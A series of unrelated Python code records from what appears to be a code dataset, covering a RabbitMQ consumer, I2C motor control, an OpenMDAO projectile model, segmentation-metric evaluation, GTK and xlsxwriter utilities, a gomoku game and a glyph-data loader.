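    credentials = pika.PlainCredentials(username, password)
    conn = pika.BlockingConnection(
        pika.ConnectionParameters(host=host, credentials=credentials))
    channel = conn.channel()
    channel.exchange_declare(exchange=exchange, exchange_type='direct',
                             durable=True)
    # A fresh exclusive queue per consumer, bound on this node's routing key.
    queue = channel.queue_declare(queue='', exclusive=True).method.queue
    channel.queue_bind(exchange=exchange, queue=queue, routing_key=routing_key)
    channel.basic_consume(queue=queue, on_message_callback=callback,
                          auto_ack=True)
    channel.start_consuming()
```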
BloodGrp, Addr_Line_1, Addr_Line_2, City, State, PIN)\r\n flash(\"Data store Successefully \", \"error\")\r\n return render_template('Personal_Details.html')\r\n ######\r\n return render_template('Personal_Details.html')\r\n else:\r\n return \"Nothing\"\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"Personal Deatils HTMl/UI_Flask.py","file_name":"UI_Flask.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"491682408","text":"#from smbus2 import SMBus\nimport smbus\nimport time\nimport os\nimport subprocess\nimport spidev\n\nclass motorTest:\n channel = 1\n bus = smbus.SMBus(channel)\n address = 0\n target_register = 0\n completion_register = 0\n maxSpeed = 5\n \n def __init__(self, addressIn, targetIn, compIn):\n #setup I2C on rasPi\n self.address = addressIn\n self.target_register = targetIn\n self.completion_register = compIn\n\n def forwardMarch(self, speed, distance):\n ###\n # speed - negative max to positive max\n # distance 1 to 256 feet\n ###\n binCmd = format(0, '0>2b')\n binDir = (format(0, '0>1b'), format(1, \"b\"))[speed > 0]\n binSpeed = format(round(abs(speed/maxSpeed*32-1)), '0>5b')\n binDist = format(distance, '0>8b')\n \n byte1 = binCmd + binDir + binSpeed\n byte2 = binDist\n \n msg = [byte1, byte2]\n bus.write_i2c_block_data(address, target_register, msg)\n\n def arcRun(self, speed, distance, radius):\n ###\n # speed - negative max to positive max\n # distance - 0 to 180 degrees\n # radius - 1 to 15 feet\n ###\n binCmd = format(0, '0>2b')\n binDir = (format(0, '0>1b'), format(1, \"b\"))[speed > 0]\n binSpeed = format(round(abs(speed/maxSpeed*32-1)), '0>5b')\n binDist = format(round(distance/180*16-1, '0>4b'))\n binRadius = format(radius, '0>4b')\n \n byte1 = binCmd + binDir + binSpeed\n byte2 = binDist + binRadius\n \n msg = [byte1, byte2]\n bus.write_i2c_block_data(address, target_register, msg)\n \n def turnInPlace(self, speed, angle):\n ###\n # speed - negative max to positive max\n # angle - 0 to 360\n ###\n binCmd = format(0, '0>2b')\n binDir = (format(0, '0>1b'), format(1, \"b\"))[speed > 0]\n binSpeed = format(round(abs(speed/maxSpeed*32-1)), '0>5b')\n binAngle = format(round(angle/360*255-1, '0>4b'))\n \n byte1 = binCmd + binDir + binSpeed\n byte2 = binAngle\n \n msg = [byte1, byte2]\n bus.write_i2c_block_data(address, target_register, msg)\n \n def commandComplete(self):\n if(read_byte_data(self.address, completion_register)):\n return True\n else:\n return False\n \n\n#setup the samd with SW, openocd\n\n\n\n","sub_path":"motor_control_API/motorTest.py","file_name":"motorTest.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183607353","text":"import numpy as np\n\nfrom openmdao.api import ExplicitComponent\n\n\n# Dynamics---original, 2nd order:\n# x''=0\n# y''=-g\n# Dynamics---modified, 1st order:\n# (x )' = x'\n# (y )' = y'\n# (x')' = 0\n# (y')' = -g\n# Initial conditions:\n# (x )_0 = 0\n# (y )_0 = 0\n# (x')_0 = v * cos(theta)\n# (y')_0 = v * sin(theta)\n# Constraints:\n# (y )_f = 0 \n# Objective:\n# (x )_f [maximize!]\n\nclass ProjectileSystem(ExplicitComponent):\n\n def initialize(self):\n self.options.declare('num_nodes', default=1, types=int)\n\n self.g = -9.81\n\n def setup(self):\n num = self.options['num_nodes']\n\n self.add_input('vx', shape=(num, 1))\n self.add_input('vy', shape=(num, 1))\n\n self.add_output('dx_dt', shape=(num, 1))\n 
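The `motorTest.py` record above builds its command "bytes" by concatenating `format(..., 'b')` strings, but `write_i2c_block_data` expects a list of integers, so the calls would fail as written (it also references `bus`, `address`, and `maxSpeed` without `self.`). Bit fields are normally packed with shifts and masks; a sketch of the same 2-bit command / 1-bit direction / 5-bit speed layout, with everything beyond that layout hypothetical:

```python
def pack_drive_byte(cmd, forward, speed, max_speed=5):
    # cmd: 2 bits | direction: 1 bit | speed: 5 bits -> one integer byte
    speed_field = max(0, round(abs(speed) / max_speed * 32 - 1)) & 0b11111
    return ((cmd & 0b11) << 6) | ((1 if forward else 0) << 5) | speed_field

# e.g.: bus.write_i2c_block_data(address, register,
#           [pack_drive_byte(0, speed > 0, speed), distance & 0xFF])
```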
self.add_output('dy_dt', shape=(num, 1))\n self.add_output('dvx_dt', shape=(num, 1))\n self.add_output('dvy_dt', shape=(num, 1))\n\n self.declare_partials('*', '*', dependent=False)\n\n self.declare_partials('dx_dt', 'vx', val=1., rows=np.arange(num), cols=np.arange(num))\n self.declare_partials('dy_dt', 'vy', val=1., rows=np.arange(num), cols=np.arange(num))\n\n def compute(self, inputs, outputs):\n outputs['dx_dt'] = inputs['vx']\n outputs['dy_dt'] = inputs['vy']\n outputs['dvx_dt'] = 0.\n outputs['dvy_dt'] = self.g\n","sub_path":"Openmdao/example/Ozone/projectile_system.py","file_name":"projectile_system.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44989416","text":"#coding=utf-8\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import jaccard_similarity_score\nfrom sklearn.metrics import f1_score\n\nimport numpy as np\nimport tensorflow as tf\nfrom model.SegCaps import SegCaps\nimport config as cfg\nimport time\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\n########################## 要改的东西 #######################################\nnum_epochs = cfg.num_epochs\nis_train=True #True使用训练集,#False使用测试集\ntest_data_number = 10\nbatch_size = cfg.batch_size\nsave_list_csv = cfg.save_list_csv\nsave_mean_csv = cfg.save_mean_csv\n########################## end ##########################################\n\nfrom v1.use_seg_tfrecord import create_inputs_seg_hand\n\n\n\ndef plot_roc_curve(y_true,y_scores):\n fpr, tpr, thresholds = roc_curve((y_true), y_scores)\n AUC_ROC = roc_auc_score(y_true, y_scores)\n print(\"Area under the ROC curve: \" + str(AUC_ROC))\n roc_curve_figure = plt.figure()\n plt.plot(fpr, tpr, '-', label='Area Under the Curve (AUC = %0.4f)' % AUC_ROC)\n plt.title('ROC curve')\n plt.xlabel(\"FPR (False Positive Rate)\")\n plt.ylabel(\"TPR (True Positive Rate)\")\n plt.legend(loc=\"lower right\")\n plt.savefig(\"ROC.png\")\n plt.cla()\n plt.close(\"all\")\n return AUC_ROC\n\ndef plot_precision_recall_curve(y_true, y_scores):\n # Precision-recall curve\n precision, recall, thresholds = precision_recall_curve(y_true, y_scores)\n precision = np.fliplr([precision])[0] # so the array is increasing (you won't get negative AUC)\n recall = np.fliplr([recall])[0] # so the array is increasing (you won't get negative AUC)\n AUC_prec_rec = np.trapz(precision, recall)\n print(\"Area under Precision-Recall curve: \" + str(AUC_prec_rec))\n prec_rec_curve = plt.figure()\n plt.plot(recall, precision, '-', label='Area Under the Curve (AUC = %0.4f)' % AUC_prec_rec)\n plt.title('Precision - Recall curve')\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.legend(loc=\"lower right\")\n plt.savefig(\"Precision_recall.png\")\n plt.cla()\n plt.close(\"all\")\n return AUC_prec_rec\n\n\ndef convert_to_binary(shape,y_scores):\n threshold_confusion = 0.5\n print(\"Confusion matrix: Custom threshold (for positive) of \" + str(threshold_confusion))\n y_pred = np.empty((shape))\n for i in range(shape):\n if y_scores[i] >= threshold_confusion:\n y_pred[i] = 1\n else:\n y_pred[i] = 0\n return y_pred\n\ndef plot_confusion_matrix(y_true, y_pred):\n # Confusion matrix\n confusion = confusion_matrix(y_true, y_pred)\n print(confusion)\n accuracy = 0\n if float(np.sum(confusion)) != 0:\n accuracy = float(confusion[0, 0] + confusion[1, 1]) / 
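The comment block in the `projectile_system.py` record above reduces x'' = 0, y'' = -g to four first-order equations; a few lines of forward Euler make that reduction concrete (a sketch, with arbitrary launch values):

```python
import math

def simulate(v0, theta, dt=0.01, g=9.81):
    # State (x, y, vx, vy); derivatives (vx, vy, 0, -g).
    x, y = 0.0, 0.0
    vx, vy = v0 * math.cos(theta), v0 * math.sin(theta)
    while y >= 0.0:
        x, y = x + vx * dt, y + vy * dt
        vy -= g * dt
    return x  # downrange distance at impact, the quantity being maximized

print(simulate(20.0, math.radians(45)))
```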
float(np.sum(confusion))\n print(\"Global Accuracy: \" + str(accuracy))\n specificity = 0\n if float(confusion[0, 0] + confusion[0, 1]) != 0:\n specificity = float(confusion[0, 0]) / float(confusion[0, 0] + confusion[0, 1])\n print(\"Specificity: \" + str(specificity))\n sensitivity = 0\n if float(confusion[1, 1] + confusion[1, 0]) != 0:\n sensitivity = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[1, 0])\n print(\"Sensitivity: \" + str(sensitivity))\n precision = 0\n if float(confusion[1, 1] + confusion[0, 1]) != 0:\n precision = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[0, 1])\n print(\"Precision: \" + str(precision))\n return accuracy, specificity, sensitivity, precision\n\ndef get_F1_score(y_true, y_pred):\n # F1 score\n F1_score = f1_score(y_true, y_pred, labels=None, average='binary', sample_weight=None)\n print(\"F1 score (F-measure): \" + str(F1_score))\n return F1_score\n\n\n\n\ndef get_jaccard_index(y_true, y_pred):\n # Jaccard similarity index\n jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True)\n print(\"Jaccard similarity score: \" + str(jaccard_index))\n return jaccard_index\n\ndef save_all_pics_value(name_list,all_list):\n\n data = {}\n # 1、保存所有图片的评估值\n for name, value in zip(name_list, all_list):\n data.update({name: value})\n print(data)\n result = pd.DataFrame(data=data)\n result.to_csv(save_list_csv, encoding='gbk')\n print('save to {}'.format(save_list_csv))\n\ndef save_mean_value(name_list,all_list):\n\n AUC_ROC_mean = np.mean(all_list[0])\n AUC_prec_rec_mean = np.mean(all_list[1])\n accuracy_mean = np.mean(all_list[2])\n specificity_mean = np.mean(all_list[3])\n sensitivity_mean = np.mean(all_list[4])\n precision_mean = np.mean(all_list[5])\n jaccard_index_mean = np.mean(all_list[6])\n F1_score_mean = np.mean(all_list[7])\n\n mean_list = [AUC_ROC_mean, AUC_prec_rec_mean, accuracy_mean, specificity_mean,\n sensitivity_mean, precision_mean, jaccard_index_mean, F1_score_mean]\n data = {}\n index = 1 # 只有一行 (为何不加这个index就会报错)\n for name, mean in zip(name_list, mean_list):\n data.update({name: mean})\n mean_result = pd.DataFrame(data, index=[index])\n mean_result.to_csv(save_mean_csv, encoding='gbk')\n print('save to {}'.format(save_mean_csv))\n\ndef start_eval():\n images, labels = create_inputs_seg_hand(is_train=is_train)\n\n session_config = tf.ConfigProto(\n device_count={'GPU': 0},\n gpu_options={'allow_growth': 1,\n # 'per_process_gpu_memory_fraction': 0.1,\n 'visible_device_list': '0'},\n allow_soft_placement=True) ##这个设置必须有,否则无论如何都会报cudnn不匹配的错误,BUG十分隐蔽,真是智障\n with tf.Session(config=session_config) as sess:\n # 1、先定义model才能执行第二步的初始化\n model = SegCaps(sess, cfg, is_train=is_train)\n\n # 2、初始化和启动线程\n tf.global_variables_initializer().run()\n tf.local_variables_initializer().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n model.restore()\n\n\n #列表初始化\n AUC_ROC_list,AUC_prec_rec_list,accuracy_list,specificity_list,sensitivity_list,\\\n precision_list,jaccard_index_list,F1_score_list,all_list,mean_list\\\n =[],[],[],[],[],[],[],[],[],[]\n #3、测试图片\n index = 0\n for i in range(test_data_number//batch_size):\n pics,pics_masks = sess.run([images,labels]) # 取出一个batchsize的图片\n # 3、计算耗时\n since = time.time()\n pre= model.predict(pics)\n seconds = time.time() - since\n\n pre_list = np.split(pre,batch_size,axis=0)\n pres = np.squeeze(pre_list,axis=0)\n\n for label, pre in zip( pics_masks, pres):\n y_scores = pre.reshape(-1, 1)\n y_true = label.reshape(-1, 1)\n\n # 
1、画ROC曲线\n AUC_ROC = plot_roc_curve(y_true,y_scores)\n AUC_ROC_list.append(AUC_ROC)\n\n #2、画P_R-curve曲线\n AUC_prec_rec = plot_precision_recall_curve(y_true,y_scores)\n AUC_prec_rec_list.append(AUC_prec_rec)\n\n #3、Confusion matrix\n y_pred_binary = convert_to_binary(shape = y_scores.shape[0], y_scores = y_scores)\n accuracy, specificity, sensitivity, precision \\\n = plot_confusion_matrix(y_true, y_pred_binary)\n\n accuracy_list.append(accuracy)\n specificity_list.append(specificity)\n sensitivity_list.append(sensitivity)\n precision_list.append(precision)\n\n #4、Jaccard similarity index\n jaccard_index = get_jaccard_index(y_true, y_pred_binary)\n jaccard_index_list.append(jaccard_index)\n\n #5、F1 score\n F1_score = get_F1_score(y_true, y_pred_binary)\n F1_score_list.append(F1_score)\n\n print('######################### end ####################################')\n\n\n #1、评估数据存进列表中\n all_list = [AUC_ROC_list, AUC_prec_rec_list, accuracy_list, specificity_list \\\n , sensitivity_list, precision_list, jaccard_index_list, F1_score_list]\n name_list = ['AUC_ROC', 'AUC_prec_rec', 'accuracy', 'specificity',\n 'sensitivity', 'precision', 'jaccard_index', 'F1_score']\n\n # 2、panda保存所有图片的评估值到CSV文件\n save_all_pics_value(name_list, all_list)\n\n #3、panda保存平均值到CSV文件\n save_mean_value(name_list, all_list)\n\n #4、结束\n coord.request_stop()\n coord.join(threads)\n\n\n\nstart_eval()","sub_path":"my_seg_tf/v1/evaluate_by_sklearn.py","file_name":"evaluate_by_sklearn.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560902947","text":"'''\nCreated on Mar 9, 2016\n\n@author: bloyd\n'''\n\nfrom gi.repository import Gtk\n\nclass MainWindow(Gtk.Window):\n \n def __init__(self):\n Gtk.Window.__init__(self, title = \"STACK S.\")\n self.set_border_width(10)\n \n box = Gtk.Box(orientation = Gtk.Orientation.VERTICAL, spacing = 10)\n self.add(box)\n \n # Stack\n main_area = Gtk.Stack()\n main_area.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT_RIGHT)\n main_area.set_transition_duration(2000)\n \n # Checkbox\n check_button = Gtk.CheckButton(\"Does it really work? 
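`convert_to_binary` in the `evaluate_by_sklearn.py` record above thresholds scores one element at a time in a Python loop; with NumPy the binarization is a single comparison, and the confusion-matrix statistics fall straight out of `ravel()`. A sketch with the same 0.5 threshold (it assumes both classes occur in `y_true`):

```python
import numpy as np
from sklearn.metrics import confusion_matrix

def binarize_and_score(y_true, y_scores, threshold=0.5):
    y_pred = (y_scores >= threshold).astype(np.uint8)  # vectorized thresholding
    tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
    accuracy = (tp + tn) / (tn + fp + fn + tp)
    sensitivity = tp / (tp + fn) if (tp + fn) else 0.0
    specificity = tn / (tn + fp) if (tn + fp) else 0.0
    return y_pred, accuracy, sensitivity, specificity
```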
Is it that close?\")\n main_area.add_titled(check_button, \"CHECKY\", \"So AWESOME\")\n \n # Label\n label = Gtk.Label()\n label.set_markup(\"THE HUGE ONE\")\n main_area.add_titled(label, \"label-name\", \"Big Label\")\n \n # StackSwitcher\n \n stack_switcher = Gtk.StackSwitcher()\n stack_switcher.set_stack(main_area)\n \n box.pack_start(stack_switcher, True, True, 0)\n box.pack_start(main_area, True, True, 0)\n \n \n \n \n \n\n\nwindow = MainWindow()\nwindow.connect(\"delete-event\", Gtk.main_quit)\nwindow.show_all()\nGtk.main()\n","sub_path":"BuckysGTKTutorials/stack_switcher.py","file_name":"stack_switcher.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"222745710","text":"# TOSHIBA - TSDV\n# Team: PHOcr\n# Author: Phung Dinh Tai\n# Email: tai.phungdinh@toshiba-tsdv.com\n# Date create: 03/07/2018\n# Updated by: Phung Dinh Tai\n# Description: Define base class for a reporter\nimport xlsxwriter\nfrom abc import ABCMeta, abstractmethod\nfrom report.lib_base.reporter import Reporter\nfrom report.lib_base.cell_format import COLH\nfrom report.lib_base.cell_format import Color, Align\n\n\nclass XlsxReporter(Reporter):\n\n __metaclass__ = ABCMeta\n\n def __init__(self, **kwargs):\n super(XlsxReporter, self).__init__(**kwargs)\n # Create work book\n self.book = None\n self.line_mapping = {}\n self.column_mapping = {}\n\n def do_work(self):\n # Collect data\n self.collect_data()\n\n # Initial workbook\n self.book = xlsxwriter.Workbook(self.output_file)\n\n # Add sheets\n self.add_sheets()\n\n # Close work book\n self.book.close()\n\n @abstractmethod\n def add_sheets(self):\n pass\n\n # Calculate accuracy\n @staticmethod\n def calculate_accuracy(error, total):\n if total == 0:\n return 0\n return (float(total) - float(error)) * 100 / float(total)\n\n @staticmethod\n def write_cell(sheet, line, column, value, cell_format):\n \"\"\"\n Write data to a cell of the work sheet\n\n Parameters\n ----------\n sheet: WorkSheet\n Sheet to write data\n line: int\n Index of line to write data\n column: int\n Index of column to write data\n value: str/int/float\n Data value to write to cell\n cell_format: Format\n Format of writing cell\n\n Returns\n -------\n None\n\n \"\"\"\n sheet.write(line, column, value, cell_format)\n\n def write_line(self, sheet, line, value_array, cell_format, start_position=0, start_value=0,\n num_elements=None):\n \"\"\"\n Write a line to excel sheet where all cells use the same format\n\n Parameters\n ----------\n sheet: WorkSheet\n Sheet to write data\n line: int\n Line number to write data\n value_array: list\n List of cell data to write to line\n cell_format: Format\n Format for all cells on the line\n start_position: int\n Index of the cell to start writing\n start_value: int\n Index of cell to start writing in input list cells\n num_elements: int\n Number of elements to write when start_value is defined\n\n Returns\n -------\n None\n\n \"\"\"\n if not num_elements:\n num_elements = len(value_array) - start_value\n\n for i in range(0, num_elements):\n self.write_cell(sheet=sheet, line=line, column=start_position + i,\n value=value_array[start_value + i], cell_format=cell_format)\n\n def write_line_multi_format(self, sheet, line, values, formats, start_position=0):\n if len(values) != len(formats):\n raise Exception(\"Wrong formats line {0}\".format(\",\".join(values)))\n for i in range(0, len(values)):\n self.write_cell(sheet=sheet, line=line, column=start_position + i, 
value=values[i],\n cell_format=formats[i])\n\n def get_cell_format(self, align=\"left\", font=\"Arial\", font_size=10, font_color=None,\n wrap_text=False, set_border=False, num_format=None, bg_color=None,\n set_bold=False):\n fm = self.book.add_format()\n fm.set_align(alignment=align)\n fm.set_font(font_name=font)\n fm.set_font_size(font_size=font_size)\n if wrap_text:\n fm.set_text_wrap()\n if set_border:\n fm.set_border()\n if set_bold:\n fm.set_bold()\n if num_format:\n fm.set_num_format(num_format=num_format)\n if font_color:\n fm.set_color(font_color=font_color)\n if bg_color:\n fm.set_bg_color(bg_color=bg_color)\n return fm\n\n @staticmethod\n def get_cell_str(line_idx, col_idx):\n return \"{0}{1}\".format(COLH[col_idx], line_idx+1)\n\n def get_condition_formula(self, sheet, column, line_start, line_end, value):\n range_start = self.get_cell_str(line_idx=line_start, col_idx=column)\n range_end = self.get_cell_str(line_idx=line_end, col_idx=column)\n return \"\\'{sheet_name}\\'!{range_start}:{range_end},{value}\".format(sheet_name=sheet,\n range_start=range_start,\n range_end=range_end,\n value=value)\n\n def get_range_formula(self, sheet, column, line_start, line_end):\n range_start = self.get_cell_str(line_idx=line_start, col_idx=column)\n range_end = self.get_cell_str(line_idx=line_end, col_idx=column)\n return \"\\'{sheet_name}\\'!{range_start}:{range_end}\".format(sheet_name=sheet,\n range_start=range_start,\n range_end=range_end)\n\n @staticmethod\n def get_accuracy_formula(errors_cell, total_cell):\n return \"=1-{errors}/{total}\".format(errors=errors_cell, total=total_cell)\n\n @staticmethod\n def get_count_formula(conditions_string):\n return \"=SUM(COUNTIFS({conditions}))\".format(conditions=conditions_string)\n\n @staticmethod\n def get_sum_formula(range_string, conditions_string):\n return \"=SUM(SUMIFS({range},{conditions}))\".format(range=range_string,\n conditions=conditions_string)\n\n @staticmethod\n def get_variance_formula(first_cell, second_cell):\n return \"={first}-{second}\".format(first=first_cell, second=second_cell)\n\n def add_format_for_variant_cell(self, worksheet, cell, is_increase_is_positive, in_percent):\n if is_increase_is_positive:\n positive_criteria = \">\"\n negative_criteria = \"<\"\n else:\n positive_criteria = \"<\"\n negative_criteria = \">\"\n\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': positive_criteria,\n 'value': 0,\n 'format': self.get_format_for_variant(True, in_percent)\n })\n\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': negative_criteria,\n 'value': 0,\n 'format': self.get_format_for_variant(False, in_percent)\n })\n\n def get_format_for_variant(self, is_positive, percent_format):\n positive_acc_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n num_format='0.00%',\n font_color=Color.GREEN,\n bg_color=Color.LIGHT_GREEN)\n negative_acc_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='0.00%',\n bg_color=Color.LIGHT_ORANGE)\n positive_acc_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.GREEN,\n num_format='#,##0',\n bg_color=Color.LIGHT_GREEN)\n negative_acc_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='#,##0',\n bg_color=Color.LIGHT_ORANGE)\n if percent_format:\n if is_positive:\n return positive_acc_format_in_percent\n else:\n return negative_acc_format_in_percent\n 
else:\n if is_positive:\n return positive_acc_format_in_number\n else:\n return negative_acc_format_in_number\n\n def add_format_for_negative_cell_by_value(self, worksheet, cell, value,\n is_increase_is_negative,\n in_percent):\n \"\"\"\n Add format for cell with condition is cell value\n\n Parameters\n ----------\n worksheet: worksheet working on.\n cell: current cell\n value: specific value\n in_percent\n\n Returns\n -------\n\n \"\"\"\n if is_increase_is_negative:\n negative_criteria = \">\"\n positive_criteria = \"<\"\n else:\n negative_criteria = \"<\"\n positive_criteria = \">\"\n\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': negative_criteria,\n 'value': value,\n 'format': self.get_format_for_negative_cell_by_value(False, in_percent)\n })\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': positive_criteria,\n 'value': value,\n 'format': self.get_format_for_negative_cell_by_value(True,\n in_percent)\n })\n\n def get_format_for_negative_cell_by_value(self, is_positive, percent_format):\n negative_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='0.00%')\n positive_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.BLACK,\n num_format='0.00%')\n negative_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='#,##0')\n\n positive_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.BLACK,\n num_format='#,##0')\n if percent_format:\n if is_positive:\n return positive_format_in_percent\n else:\n return negative_format_in_percent\n else:\n if is_positive:\n return positive_format_in_number\n else:\n return negative_format_in_number\n","sub_path":"utilities/report/lib_base/xlsx_reporter.py","file_name":"xlsx_reporter.py","file_ext":"py","file_size_in_byte":11712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591245123","text":"import numpy as np\nimport constant as c\nimport copy\n\n# board: 1 means black -1 means white 0 means nothing\n# player: BLACK/WHITE player's turn\n# game_history allows player to go back\nclass Game(object):\n def __init__(self):\n self.board = np.zeros((c.SIZE, c.SIZE))\n self.player = c.BLACK_P\n self.game_history = []\n self.mode = 0 #0=uninitialized, 1=pvai, 2=aivp, 3=pvp, 4=aivsai\n self.finish = 0 #0=not finish, 1=BLACK WIN, 2=WHITE WIN\n\n # return True if legal, False if illegal\n def move(self, pos, record=True):\n # if game ended, cannot precede\n if self.finish:\n return False\n\n # otherwise place stone\n x, y = pos\n if self.board[x,y] != 0:\n return True\n if record:\n state = (np.copy(self.board), self.player)\n self.game_history.append(state)\n # place piece\n self.board[x,y] = self.player\n self.finish = self.check_win(pos)\n # switch player if no winner\n if self.finish == 0: self.player = -self.player\n return False\n\n def check_win(self, pos):\n x,y = pos\n row = self.board[x,:]\n col = self.board[:,y]\n diag1, diag2 = [], []\n for off in range(-4, 5):\n if x+off>=0 and x+off=0 and y+off=0 and x+off=0 and y-off= 5: return 1\n elif longest <= -5: return -1\n return 0\n\n def go_back(self, step_size=1):\n for i in range(step_size):\n state = self.game_history.pop()\n self.board, self.player = state\n self.finish = 0\n\n def get_msg(self):\n if self.mode == 0:\n return [('BLACK', c.BLACK), ('WHITE', c.WHITE), ('PVP', c.RED), ('AI', 
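The variance coloring in the `xlsx_reporter.py` record above boils down to two `conditional_format` rules per cell, one for each sign. The core xlsxwriter calls, stripped of the class plumbing (a sketch writing a throwaway workbook):

```python
import xlsxwriter

book = xlsxwriter.Workbook('variants.xlsx')
sheet = book.add_worksheet()
green = book.add_format({'font_color': 'green', 'num_format': '0.00%'})
red = book.add_format({'font_color': 'red', 'num_format': '0.00%'})
sheet.write_row('A1', [0.012, -0.034, 0.0])
# One rule per sign: positives green, negatives red.
sheet.conditional_format('A1:C1', {'type': 'cell', 'criteria': '>',
                                   'value': 0, 'format': green})
sheet.conditional_format('A1:C1', {'type': 'cell', 'criteria': '<',
                                   'value': 0, 'format': red})
book.close()
```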
c.GREEN)]\n if self.mode==1 or self.mode==2 or self.mode==3:\n return [('GO BACK', c.BLACK), ('CONCEDE', c.RED), ('RESTART', c.GREEN)]\n else:\n return []\n\n def get_button(self, button):\n if self.mode==0 and button>=1 and button<=4:\n self.mode = button\n return\n # if click \"go back button\"\n if (self.mode == 1 or self.mode == 2):\n if (button==1 and len(self.game_history)>=2): self.go_back(2)\n if self.mode == 3:\n if (button==1 and len(self.game_history)>=1): self.go_back(1)\n # if click \"restart button\"\n if self.mode>=1 and self.mode<=3 and button == 3:\n self.__init__()\n # if click \"concede button\"\n if self.mode>=1 and self.mode<=3 and button == 2 and self.finish==0:\n self.finish = -self.player\n","sub_path":"src/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"285251511","text":"\"\"\"Json reader for glyph data dictionaries and individual\nglyph data dictionaries.\"\"\"\nimport os\nimport json\n\n\ndef _glyph_data(json_file):\n \"\"\"Load json glyph data files. Json should be structured in the\n following manner:\n [\n {\n \"name\": \"endash\",\n \"unicode\": 8211,\n \"contours\": [\n 1\n ]\n },\n {\n \"name\": \"emdash\",\n \"unicode\": 8212,\n \"contours\": [\n 1\n ]\n },\n ]\n\n \"name\" and \"unicode \"are compulsory keys which should be included in\n all glyph data files.\n\n \"unicode\" is an integer instead of a hex so it matches TTFont's cmap\n table key.\n \"\"\"\n glyphs = {}\n with open(json_file, 'r') as glyph_data:\n glyph_data = json.loads(glyph_data.read())\n for glyph in glyph_data:\n glyphs[glyph['unicode']] = glyph\n return glyphs\n\n\npath = os.path.dirname(__file__)\n\n# The desired_glyph_data.json file contains the 'recommended' countour count\n# for encoded glyphs. The contour counts are derived from fonts which were\n# chosen for their quality and unique design decisions for particular glyphs.\n\n# Why make this?\n# Visually QAing thousands of glyphs by hand is tiring. Most glyphs can only\n# be constructured in a handful of ways. This means a glyph's contour count\n# will only differ slightly amongst different fonts, e.g a 'g' could either\n# be 2 or 3 contours, depending on whether its double story or single story.\n# However, a quotedbl should have 2 contours, unless the font belongs to a\n# display family.\n\n# In the future, additional glyph data can be included. A good addition would\n# be the 'recommended' anchor counts for each glyph.\ndesired_glyph_data_path = os.path.join(path, 'desired_glyph_data.json')\ndesired_glyph_data = _glyph_data(desired_glyph_data_path)\n","sub_path":"Lib/fontbakery/glyphdata.py","file_name":"glyphdata.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"380337682","text":"\r\nimport json\r\nimport urllib.request\r\n\r\n\r\nUserList=['elmiram', 'maryszmary', 'lizaku', 'nevmenandr', 'ancatmara', 'roctbb', 'akutuzov', 'agricolamz',\r\n 'lehkost', 'kylepjohnson', 'mikekestemont', 'demidovakatya', 'shwars', 'JelteF', 'timgraham', 'arogozhnikov',\r\n 'jasny', 'bcongdon', 'whyisjake', 'gvanrossum']\r\n\r\nprint ('Здравствуйте. 
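The `check_win` body in the `game.py` record above is visibly damaged: the `< c.SIZE` bounds checks and the run-counting loop feeding `longest` have been eaten, most likely because the `<...>` spans were stripped as HTML tags. A plausible reconstruction of the four-direction, five-in-a-row scan, with the bounds and run logic inferred rather than taken from the source:

```python
import numpy as np

def check_win(board, pos, size=15, target=5):
    x, y = pos
    player = board[x, y]
    diag1 = [board[x + off, y + off] for off in range(-4, 5)
             if 0 <= x + off < size and 0 <= y + off < size]
    diag2 = [board[x + off, y - off] for off in range(-4, 5)
             if 0 <= x + off < size and 0 <= y - off < size]
    for line in (board[x, :], board[:, y], np.array(diag1), np.array(diag2)):
        run = 0
        for v in line:
            run = run + 1 if v == player else 0
            if run >= target:
                return int(player)  # 1 = black wins, -1 = white wins
    return 0
```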
